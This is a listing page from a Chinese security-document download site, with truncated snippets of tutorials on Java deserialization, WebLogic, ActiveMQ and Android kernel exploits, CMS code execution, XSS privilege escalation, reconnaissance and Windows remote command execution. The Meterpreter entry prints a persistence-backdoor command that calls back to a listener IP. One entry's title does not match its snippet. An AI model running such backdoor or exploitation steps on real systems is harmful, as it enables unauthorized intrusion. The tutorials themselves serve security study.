爱豆文档 - 信息安全文档下载平台 - idocdown.com （部分文档，免费下载）

. . . . . .

JDK反序列化Gadgets 7u21

# JDK反序列化Gadgets 7u21漏洞分析与利用 ## 前言 JDK 7u21反序列化漏洞是一个经典的Java反序列化利用链，影响JDK 7u25之前的版本。该漏洞利用链中的所有类都是JDK自带的，最终关键类是`com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl`。本文将详细分析该漏洞的原理、利用条件以及完整的利用链构造过程。 ## 漏洞原理 ### 核心触发点漏洞的核心触发点是`TemplatesImpl`类

2025-08-26 10:52:48

Weblogic-T3-CVE-2019-2890-Analysis

# Weblogic T3 CVE-2019-2890 漏洞分析与利用教学文档 ## 0x00 漏洞概述 CVE-2019-2890是Weblogic服务器中的一个反序列化漏洞，存在于T3协议中。该漏洞允许攻击者在授权状态下通过构造特殊的T3请求实现远程代码执行。漏洞评级为高危，主要影响Weblogic 10.3.6和12版本。 ## 0x01 漏洞原理 ### 关键点分析 1. **反序列化入口**：漏洞存在于`PersistenContext`类的`readSubject`方法中

2025-08-26 10:51:17

Android内核漏洞学习——CVE-2014-3153分析（1）

# CVE-2014-3153 Android内核漏洞分析与利用教学文档 ## 1. 漏洞概述 CVE-2014-3153是一个影响广泛的Linux内核提权漏洞，在Android系统中尤为著名。该漏洞由著名黑客Geohot利用并开发出TowelRoot工具，实现了简单粗暴的Android root提权。漏洞本质是Linux内核中的use-after-free漏洞，涉及Futex(Fast Userspace muTexes)机制的实现问题。 ## 2. Futex基础 ### 2.1

2025-08-26 10:50:15

某一cms后台代码执行漏洞

# UCMS后台代码执行漏洞分析与利用 ## 漏洞概述 UCMS内容管理系统存在一个后台代码执行漏洞，允许已认证的攻击者通过文件编辑功能写入任意文件内容，从而导致远程代码执行(RCE)。该漏洞存在于后台文件管理模块，需要管理员权限才能利用。 ## 漏洞影响 - 影响版本：特定版本的UCMS系统 - 漏洞类型：文件写入导致代码执行 - 危害等级：高危（需要后台管理员权限） ## 漏洞复现步骤 1. **登录后台**：首先需要获取有效的管理员凭证登录系统后台 2. **访问文件管理**

2025-08-26 10:49:09

meterpreter后渗透之权限维持

# Meterpreter后渗透权限维持技术详解 ## 一、Persistence后门创建 ### 1. 基本命令使用Meterpreter的`persistence`模块创建持久性后门： ```bash run persistence -S -U -X -i 5 -p 6666 -r 192.168.85.130 ``` ### 2. 参数详解 | 参数 | 说明 | |------|------| | -A | 自动启动匹配的漏洞处理程序连接代理 | | -L | 指定有效负

2025-08-26 10:48:10

windows远程执行cmd命令的9种方法

# Windows远程执行CMD命令的9种方法详解 ## 一、远程执行命令方式及对应端口 | 方法 | 使用端口 | |--------------------|----------| | IPC$+AT | 445 | | PSEXEC | 445 | | WMI | 135 | | Winrm | 5985(HTTP)/5986(

2025-08-26 10:47:12

渗透测试初期之信息收集

# 渗透测试初期信息收集全面指南 ## 前言信息收集是渗透测试的第一步，也是至关重要的一步。通过全面细致的信息收集，我们可以对目标系统有整体了解，从而找出薄弱环节进行后续渗透。本文将详细讲解IP收集、端口扫描、子域收集、Web技术确认和URL收集五个关键方面的技术和方法。 ## IP收集 ### CDN绕过技术随着内容分发网络(CDN)的广泛应用，直接获取目标真实IP变得更具挑战性。IP收集不仅能扩大渗透范围，还可能找出CDN背后的真实服务器。 ### 全球IP信息查询工具 1

2025-08-26 10:46:16

在互联网端口扫描过程中寻找速度和准确度之间的平衡点

# 互联网端口扫描中速度与准确度的平衡策略 ## 1. 端口扫描概述端口扫描是渗透测试和漏洞赏金活动中最重要的侦察阶段技术之一，用于识别目标主机和网络上的开放端口及运行的服务。 ### 1.1 扫描器分类 **面向连接(同步模式)扫描器**： - 特点：发送请求并等待响应，直到超时 - 优点：准确性高，能识别丢弃的数据包 - 代表工具：Nmap **无连接(异步模式)扫描器**： - 特点：不依赖当前端口探测完成即可启动下一个端口扫描 - 优点：扫描速度快 - 缺点：结果可能不太准确

2025-08-26 10:45:33

记一次渗透测试历程

# 渗透测试实战教学：从信息收集到绕过防御获取Shell ## 1. 信息收集阶段 ### 1.1 目录和文件发现 - **.project文件**：暴露项目结构信息 - **sql目录遍历**：发现SQL导出文件 - **uploads目录遍历**：可能发现上传漏洞 - **phpmyadmin泄露**：数据库管理界面暴露 - **superadmin目录泄露**：后台管理路径暴露 - **include目录遍历**：可能包含敏感配置文件 ### 1.2 数据库信息获取 1. 从sql目

2025-08-26 10:44:17

Bug Bounty:利用基于AngularJS的XSS进行权限提升

# 利用基于AngularJS的XSS进行权限提升 - 技术分析文档 ## 1. 漏洞背景本文档详细分析了一个基于AngularJS的XSS漏洞如何被用于权限提升的实际案例。攻击者通过精心构造的XSS攻击链，成功将普通用户权限提升至管理员权限。 ## 2. 漏洞发现 ### 2.1 目标环境 - 目标系统：基于AngularJS的Web应用 - 漏洞位置：用户个人资料页面（`https://www.site.com/users/username-here`） - 受影响功能：用户名显示

2025-08-26 10:43:29

由JSON CSRF到FormData攻击

# Apache ActiveMQ 远程代码执行漏洞（CVE-2023-46604）分析与防护指南 ## 1. 漏洞概述 CVE-2023-46604是Apache ActiveMQ中的一个严重远程代码执行漏洞，影响多个版本。该漏洞源于OpenWire协议命令解析机制缺陷，允许攻击者通过构造恶意数据包在目标服务器上执行任意代码。 ## 2. 受影响版本 - Apache ActiveMQ 5.18.0 - 5.18.3 - Apache ActiveMQ 5.17.0 - 5.17.6 -

2025-08-26 10:32:08

浅谈企业内部IT系统漏洞的挖掘（下）

# 企业内部IT系统漏洞挖掘指南（下） ## 一、寻找企业内网域名企业通常使用独立域名或二级域名来管理内部业务系统。常见的内网域名模式包括： 1. **常见内网域名格式**： - abc-inc.com - *.corp.abc.com - *.intra.abc.com - abc-corp.com - abc-ltd.com 2. **信息收集方法**： - 使用子域名爆破工具如subDomainBrute - 重点从企业邮箱、VPN、OA

2025-08-26 10:31:44

跳转到页